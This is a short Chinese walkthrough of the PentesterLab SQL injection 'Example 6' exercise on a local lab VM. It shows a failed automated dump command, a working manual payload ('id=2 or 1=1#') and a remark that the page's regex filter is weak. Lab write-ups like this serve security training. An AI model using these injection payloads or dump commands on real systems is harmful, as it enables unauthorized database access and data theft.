我们打开靶机,选择“SQL Injections”

选择“Example6”


PentestLab-web安全SQL注入-EXP6_php


观察页面


PentestLab-web安全SQL注入-EXP6_php_02

我们使用工具测试


参数为


-u "http://192.168.29.148/sqli/example6.php?id=2" --dump all


开始测试


PentestLab-web安全SQL注入-EXP6_php_03


没有发现


我们使用手工注入


我们发现是数字


http://192.168.20.157/sqli/example6.php?id=1


于是我们payload为


http://192.168.20.157/sqli/example6.php?id=2%20or%201=1%23123123


结果


PentestLab-web安全SQL注入-EXP6_php_04


我们打开靶机,分析源代码


PentestLab-web安全SQL注入-EXP6_sql_05


我们发现是跟exp5一样,只是使用正则规则过滤一些数字和$符号